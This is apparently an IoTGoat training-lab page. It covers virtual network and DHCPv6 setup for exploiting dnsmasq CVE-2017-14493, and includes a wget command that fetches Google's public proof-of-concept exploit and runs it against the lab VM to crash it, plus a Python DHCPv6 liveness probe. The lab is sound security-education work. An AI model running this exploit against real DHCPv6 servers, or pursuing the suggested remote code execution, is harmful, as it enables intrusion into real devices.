Dnsmasq exercise setup
Dnsmasq is a popular open-source lightweight DNS forwarder and DHCP server, and it is used in IoTGoat's firmware. The installed Dnsmasq package (version 2.7.3) contains several vulnerabilities; this page describes the environment setup needed to exploit memory corruption vulnerabilities such as CVE-2017-14493 in a controlled environment. For additional details regarding Dnsmasq vulnerabilities and exploits, see Google Security's blog post "Behind the Masq: Yet more DNS, and DHCP, vulnerabilities".
IoTGoat's virtual machine is connected to the Host via a NAT network by default, as illustrated in the image below. The Host Machine provides an IP address to IoTGoat via DHCP; thus the VM's network connection, including internet access, is provided by the Host Machine.
To perform dnsmasq memory corruption attacks, we will exploit the DHCPv6 service of dnsmasq, as demonstrated in CVE-2017-14493. This requires the DHCPv6 service to be enabled within IoTGoat; it will be used to distribute IP addresses in this exercise.
To do so, a custom subnet (network) simulating a LAN behind IoTGoat needs to be configured. IoTGoat will serve the vulnerable dnsmasq DHCP service and hand out IP addresses to VMs connected to the custom network, similar to how a normal router behaves. The following image shows the IoTGoat setup on the left, with two hosts receiving IP addresses on the same virtual network, while the right side shows a typical home internet environment.
A typical home router is connected to the internet via an ISP (Internet Service Provider) on its WAN interface. Similarly, the Host Machine acts as the ISP for IoTGoat, as it provides internet to IoTGoat's WAN interface. Devices within the virtual network can reach IoTGoat via the default IPv4 address 192.168.99.1 or the IPv6 address fdca:1:2:3:4::1234. Subsequent sections provide walkthroughs for preparing the virtual network and IoTGoat configurations.
- Create a custom network.
- Add 2 network adapters to IoTGoat.
In your virtualization software (VMware, VirtualBox, etc.), create a custom network that IoTGoat can use as its LAN interface. The network should have the following specifications:
- Disable DHCP for this subnet (IoTGoat will provide DHCP services).
- Enable VMs on the network to connect to external networks (allows access to the internet).
- Disallow connecting the host to the virtual network.
See the following links and associated images for further assistance with configuring such settings on popular virtualization platforms.
- VMware Fusion (top left)
- Select Preferences
- Select Network
- Click the 🔒 button and authenticate to make changes
- Click the "+" sign to add a new virtual network interface
- Check the "Allow virtual machines on this network to connect to external networks (Using NAT)" box
Reference: Creating Custom Networks
Reference: Add a Host-Only Virtual Network
Reference: How to create multiple NAT Networks in VirtualBox
The attacker machine will be simulated by another VM connected to IoTGoat's virtual network interface (vmnet3 in this case), configured in the previous section. Refer to the example configuration in the following image.
The attacker computer should receive an IPv4 and an IPv6 address from IoTGoat as highlighted in the following image.
Two network adapters must be created within the IoTGoat virtual machine (select "Add Device" and choose the "Network Adapter" device to add).
The first network adapter should be connected to the custom network that we created (vmnet3 in the image above).
The second network adapter must be connected to the host machine via NAT.
The next step is the network configuration on the IoTGoat VM. Specifically, static IPs will be assigned and dnsmasq will be configured to serve IPv4 and IPv6 addresses via DHCP to the hosts connected to IoTGoat.
A Dnsmasq setup script is available for performing the required changes. The script can be executed from the root folder; refer to the examples provided below. To revert to the original settings, execute the script with the -d default flag.
root@IoTGoat:/# ./dnsmasq_setup.sh
#############
Please ensure Dnsmasq network setup has been followed. See https://tinyurl.com/dnsmasq
To set back to default, use -d default
Usage: sh ./dnsmasq_setup.sh
#############
wl0(mac80211): Interface type not supported
Command failed: Not found
Command failed: Not found
wl0(mac80211): Interface type not supported
[+] Done!
root@IoTGoat:/# ./dnsmasq_setup.sh -d default
#############
Please ensure Dnsmasq network setup has been followed. See https://tinyurl.com/dnsmasq
To set back to default, use -d default
Usage: sh ./dnsmasq_setup.sh
#############
Setting network configs back to default
[+] Done!
Instructions to execute the PoC attack are provided in Google's security research repository. Refer to CVE-2017-14493-instructions.txt and CVE-2017-14493.py for this exercise. For simplicity, download the raw Python script (CVE-2017-14493.py) via wget and execute it to send the payload targeting IoTGoat's statically configured IPv6 address on port 547, as shown below.
$ wget https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py
$ python CVE-2017-14493.py fdca:1:2:3:4::1234 547
[+] sending 120 bytes to fdca:1:2:3:4::1234:547
The following image shows the crash behavior from IoTGoat.
With the vulnerability (CVE-2017-14493) successfully verified, proceed with developing a working exploit to perform remote code execution.
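Before sending the PoC it is worth confirming that dnsmasq's DHCPv6 listener on port 547 actually answers, and the same check shows the crash afterwards, because a crashed dnsmasq simply stops answering. The following Python probe is an added example, not part of this page or of Google's PoC: it sends a well-formed DHCPv6 Solicit to the IoTGoat IPv6 address above, parses the Advertise or Reply, and reports any offered addresses and status code. It assumes it runs as root on the attacker VM (to bind the DHCPv6 client port 546); the client MAC inside the DUID is a constructed value.

```python
import os, socket, struct

SOLICIT, OPT_CLIENTID, OPT_IA_NA, OPT_IAADDR, OPT_ELAPSED, OPT_STATUS = 1, 1, 3, 5, 8, 13
IOTGOAT_V6, SERVER_PORT, CLIENT_PORT = "fdca:1:2:3:4::1234", 547, 546

def option(code, data):
    return struct.pack("!HH", code, len(data)) + data  # DHCPv6 option: code(2) len(2) data

def build_solicit(xid, mac, iaid=1):
    """Solicit with a DUID-LL client id, one IA_NA and elapsed time: enough for a lease offer."""
    duid_ll = struct.pack("!HH", 3, 1) + mac        # DUID type 3, hardware type 1 (Ethernet)
    ia_na = struct.pack("!III", iaid, 0, 0)          # IAID, T1, T2 (0 = server chooses)
    return (bytes([SOLICIT]) + xid.to_bytes(3, "big") + option(OPT_CLIENTID, duid_ll)
            + option(OPT_IA_NA, ia_na) + option(OPT_ELAPSED, b"\x00\x00"))

def parse_options(buf):
    """Decode an option list into [(code, data), ...]; a length past the buffer end is an error."""
    out, i = [], 0
    while i + 4 <= len(buf):
        code, length = struct.unpack_from("!HH", buf, i)
        if i + 4 + length > len(buf): raise ValueError("truncated option %d" % code)
        out.append((code, buf[i + 4:i + 4 + length]))
        i += 4 + length
    return out

def parse_reply(pkt):
    """Return (msg_type, xid, offered IPv6 addresses, status code or None) from a server message."""
    if len(pkt) < 4: raise ValueError("short DHCPv6 message")
    addrs, status = [], None
    for code, data in parse_options(pkt[4:]):
        if code == OPT_IA_NA:                        # IA_NA body: IAID, T1, T2, then sub-options
            for sub, sdata in parse_options(data[12:]):
                if sub == OPT_IAADDR and len(sdata) >= 24:
                    addrs.append(socket.inet_ntop(socket.AF_INET6, sdata[:16]))
        elif code == OPT_STATUS and len(data) >= 2:
            status = struct.unpack_from("!H", data)[0]
    return pkt[0], int.from_bytes(pkt[1:4], "big"), addrs, status

def probe(target=IOTGOAT_V6, timeout=3.0):
    """Send one Solicit to port 547; None means no answer in time (e.g. dnsmasq has crashed)."""
    xid = int.from_bytes(os.urandom(3), "big")
    with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as sock:
        sock.bind(("::", CLIENT_PORT))               # needs root: dnsmasq replies to port 546
        sock.settimeout(timeout)
        sock.sendto(build_solicit(xid, b"\x02\x00\x00\x00\x00\x01"), (target, SERVER_PORT))
        try:
            msg_type, rxid, addrs, status = parse_reply(sock.recvfrom(4096)[0])
        except socket.timeout:
            return None
    return (msg_type, addrs, status) if rxid == xid else None
```

Call `probe()` from the attacker VM before and after the PoC: an Advertise with an address from the IoTGoat range means the listener is healthy, while `None` after the PoC matches the crash shown in the image.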